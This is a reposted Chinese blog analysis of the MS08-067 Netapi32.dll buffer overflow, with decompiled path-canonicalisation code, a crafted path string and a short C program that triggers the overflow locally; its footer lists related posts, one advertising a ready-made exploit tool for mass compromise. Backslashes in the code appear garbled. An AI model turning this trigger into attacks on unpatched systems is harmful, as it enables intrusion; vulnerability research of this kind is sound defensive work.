MS08-067漏洞分析

最新推荐文章于 2024-03-15 11:37:56 发布
最新推荐文章于 2024-03-15 11:37:56 发布
阅读量3.4k 收藏 1
点赞数
分类专栏: 信息安全 操作系统 文章标签: 安全漏洞 漏洞 windows

转载出处:http://blog.csdn.net/iiprogram/article/details/3156229


前天看到微软紧急发布了一个漏洞补丁,就去看了下,发现该漏洞影响覆盖面非常广,包括Windows 2000/XP/2003/Vista/2008的各个版本,甚至还包括测试阶段的Windows 7 Pre-Beta,并且漏洞存在于Windows系统默认开启的Server服务当中,而且超越了当年风靡一时的MS06-040漏洞(又想起当年用该漏洞。。。。。。。嘿嘿)。这也难怪微软打破周二发布补丁的惯例。于是下了补丁研究研究。


下完补丁,发现被打补丁的又是 Netapi32.dll,对比原文件和补丁中的文件,有问题的函数又是
NetpwPathCanonicalize(MS06-040也是这个函数,具体信息请搜索)简单说下这个函数:
该函数用于标准化一个路径,一般用于本地调用,若调用者指定了一个远程计算机名将会使用RPC。

该函数能够处理的路径类型:
1.相对路径 e.g. foo/bar
2.绝对路径 e.g. /foo/bar 
3.UNC 路径 e.g. //computer/share/foo
4.全路径  e.g. d:/foo/bar

该函数声明如下:
DWORD
NetpwPathCanonicalize(
LPWSTR PathName, //需要标准化的路径
LPWSTR Outbuf, //存储标准化后的路径的Buffer
DWORD OutbufLen, //Buffer长度
LPWSTR Prefix, //可选参数,当PathName是相对路径时有用
LPDWORD PathType, //存储路径类型
DWORD Flags // 保留,为0
)

该函数中在一个循环里使用wcscpy,恶意攻击者通过构造一个精心设计的路径将使漏洞触发。

结合IDA分析该函数:(F5 + 整理 + 主要代码)

int __stdcall NetpwPathCanonicalize(LPWSTR PathName, LPWSTR Outbuf, DWORD OutbufLen, LPWSTR Prefix, LPDWORD PathType, DWORD Flags)
{
  bool v7;
  int result;

  v7 = !Prefix || !*Prefix;
  Prefix = (LPWSTR)*PathType;

    if ( *PathType || (result = NetpwPathType(PathName, (int)&Prefix, 0), !result) )
    {
      if ( v7 || (result = NetpwPathType(Prefix, (int)&Flags, 0), !result) )
      {
        if ( OutbufLen != 0 )
        {
          *Outbuf = 0;
          result = CanonPathName(Prefix, PathName, Outbuf, OutbufLen, 0); //核心函数,主要处理在这里,问题也出在这里
          if ( !result )
            result = NetpwPathType(Outbuf, (int)PathType, 0);
        }
        else
        {
          result = 2123;
        }
      }
    }

  return result;
}

int __stdcall CanonPathName(LPWSTR PathPrefix, LPWSTR PathName, LPWSTR Buffer, DWORD BufferSize, LPDWORD RetSize)
{
  size_t preLen;
  size_t pathLen;
  wchar_t pathBuffer[MAX_PATH*2 + 1];

  if ( PathPrefix && *PathPrefix )
  {
    preLen = wcslen(PathPrefix);
    if ( preLen != 0)
    {
      if ( preLen > 520 ) //520 = sizeof(pathBuffer) - 1
        return 0x7Bu; // ERROR_INVALID_NAME
       
      wcscpy(pathBuffer, PathPrefix);
     
      if ( pathBuffer[preLen-1] != '//' && pathBuffer[preLen-1] != '/') //判断前缀是否以'/'或'/'结尾
      {
          wcscat(pathBuffer, L"//");
          ++preLen;
      }
      if ( PathName[0] == '//' || PathName[0] == '/' )
        ++pathLen;
    }
  }
  else
  {
    pathBuffer[0] = 0;
  }
  pathLen = wcslen(PathName);

  if (pathLen + preLen > sizeof(pathBuffer) - 1)
    return 0x7Bu; // ERROR_INVALID_NAME

  wcscat(pathBuffer, PathName);

  if ( pathBuffer )
  {
    do //该循环把路径中的'/'转换成'/'
    {
      if ( *pathBuffer == '/' )
        *pathBuffer = '//';
      ++pathBuffer;
    }
    while ( *pathBuffer );
  }
  if ( !sub_71C4A2CA() && !ConPathMacros(pathBuffer) ) //ConPathMacros中存在缓冲区溢出漏洞!!!
    return 0x7Bu;
  pathLen = 2 * wcslen(&pathBuffer) + 2;
  if ( pathLen > BufferSize )
  {
    if ( RetSize )
      *RetSize = pathLen;
    result = 0x84Bu;
  }
  else
  {
    wcscpy(Buffer, &pathBuffer);
    result = 0;
  }
  return result;
}

函数ConPathMacros在附件中可以找到。
在测试时大家可以把函数ConPathMacros单独提取出来,传入一个路径,看其是怎样去掉路径中的/..和/.宏

构造恶意路径:
形如".x//..//..//aaaaaaaaaaaaaaaaaaaaaaaaaaaaa"即可导致函数ConPathMacros漏洞的触发

溢出 Netapi32.dll:

int main(int argc, char* argv[])
{
    WCHAR szBuffer[] = L".x//..//..//aaaaaaaaaaaaaaaaaaaaaaaaaaaa";

    //ConvertPathMacros(szBuffer);
    //printf("%S/n", szBuffer);

    HMODULE h = LoadLibrary("netapi32.dll");
    if(h != NULL)
    {
        NetpwPathCanonicalize = (pNetpwPathCanonicalize)GetProcAddress(h, "NetpwPathCanonicalize");
        if(NetpwPathCanonicalize != NULL)
        {
            WCHAR Buffer[256] = L"";
            DWORD type = 1000; //不能为0,否则构造的路径过不了NetpwPathType的检查
            DWORD ret = NetpwPathCanonicalize(szBuffer, Buffer, 512, NULL, &type, 0);
            printf("ret = %x/n", ret);
            printf("%S/n", Buffer);
        }
        FreeLibrary(h);
    }
    return 0;
}

漏洞的源头找到了,加个shellcode写个Remote Exploit不难。。。况且可以参考 MS06-040,

手工实现RPC通信等等。。。


Bulletin:
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

_nMaple_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS08-067源码分析
04-04
MS08-067漏洞源码,用于分析研究,适用于window2003、XP、Win7
MS08_067漏洞详解
m0_64593235的博客
04-17 849
MS08_067漏洞详解
Kali之MSF的MS08-067漏洞复现详解
weixin_47899104的博客
12-05 6179
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kali㉿kali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
MS08-067 漏洞利用与安全加固
最新发布
theRavensea
03-15 1546
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。 Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。NetPathCanonicalize 函数在远程访问其他主机时会调用 NetpwCanoni
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
热门推荐
做自己喜欢的事,并将其发挥到极致!
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
MS08-067漏洞渗透测试
forget_mt的博客
03-28 9390
提示:靶机 windows XP IP:172.16.5.27 攻击机 kali IP:172.16.5.28 文章目录 前言 漏洞介绍 nmap扫描 MS08-067利用 总结 前言 利用msfconsole控制台的exploit/windows/smb/ms08_067_netapi攻击模块对靶机445端口的攻击过程,成功进入后渗透,开启靶机的3389远程登录 漏洞介绍: ms08_067漏洞是的著名...
MS08-067漏洞深入分析文档
02-25
MS08-067漏洞深入分析文档,需要的就下载看看拉,,,,,,,,,,,,,,,,,,,,,
Excel 2007(MS2009-067)漏洞分析报告.doc
09-24
Excel 2007(MS2009-067)漏洞分析报告详细的给出了漏洞溢出点及如何利用该漏洞
windows 漏洞补丁MS12-020.msu
05-10
ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。   根据实际被入侵终端进行分析,开放...
ms06-040漏洞分析1
08-08
3. 漏洞利用漏洞的利用分为本地和远程两种,本地利用用于分析此导出函数存在的漏洞,在远程靠此漏洞进行恶意代码执行,进而控制存在此漏洞的主机 4. 漏洞影响此例中
MS08-067漏洞攻击全程演示(图解).
04-28
MS08-067漏洞攻击全程演示(图解)
MS08067漏洞利用分析报告
03-26
MS08067漏洞利用分析,主要通过两个虚拟机系统实现RPC调用,并通过该测试,完成攻击代码测试
可用的ms08-067漏洞溢出程序(带源码)
05-19
MS08-067 最新利用工具 直接溢出后开启对方4444端口 —————————————————————————————————————— 经过测试从XP到2000、2003、Vista都可以拿下权限,对方机器要有TCP139或TCP445端口 使用效果是,基本上一晚上拿千台肉鸡不是问题…… MS08-067.exe 然后直接telnet 对方 4444端口即可。
网安学习日记-MS08-067远程溢出漏洞学习(CVE-2008-4250)
末班车的博客
03-10 656
MS08-067远程代码执行漏洞详细利用过程与发现思路
网络安全基础之Windows漏洞复现 (MS08-067
weixin_60888404的博客
06-03 2674
本次介绍Windows系统漏洞 MS08-087Windows Server服务 RPC 缓冲区远程溢出漏洞编号 MS08-067MS08_067漏洞渗透攻击原理原理就是攻击者利用受害者默认开启的SMB服务端口445端口发送恶意的资料到这个端口,通过MSRPC接口调用Server服务的函数,并破坏程序的栈缓冲区,利用远程代码执行权限,从而控制主机前期准备: 靶机:Windows 2003 (未打补丁) 攻击机:kali LinuxMS08_067漏洞渗透攻击过程使用
渗透攻击MS08-067
hmysn的博客
12-22 1952
渗透攻击MS08-067
Metasploit MS08-067 漏洞利用演示
qq_36991248的博客
12-31 2356
Metasploit MS08-067 漏洞利用演示 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。 原理解析: 攻击者利用windows操作系统默认开放的SMB服务445端口发送恶意代码到目标主机,通过MSRPC接口调用Server服务的一个函数,溢出栈缓冲区,获得远程代码执行权限,从而完全控制主机Win..
ms08-067漏洞复现
老司机开代码的博客
09-09 4486
文章目录ms08-067简介复现实验环境漏洞利用 ms08-067简介 Windows Server服务RPC请求缓冲区溢出漏洞MS08-067)。 漏洞类别:远程溢出 CVE-ID : 2008-4250 漏洞详情: MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windo
ms08-067漏洞利用
07-28
ms08-067是一种远程代码执行漏洞,影响微软Windows操作系统的SMBv1协议。通过利用此漏洞,攻击者可以在目标系统上执行恶意代码,获取系统权限,并对系统进行操控。 要利用ms08-067漏洞,攻击者需要使用相应的漏洞利用工具。这些工具通常会尝试发送特定的恶意数据包到目标系统的SMB服务,以触发漏洞并执行攻击者的代码。 然而,我必须强调,在任何情况下,利用漏洞来攻击他人或未经授权访问系统都是违法行为,并且是道德和法律所不允许的。我不能提供任何有关利用ms08-067漏洞的详细信息或支持。如果您对网络安全和漏洞研究感兴趣,请遵循合法和道德的路径,例如学习和研究网络安全领域的知识,并通过合法途径提供安全建议和支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值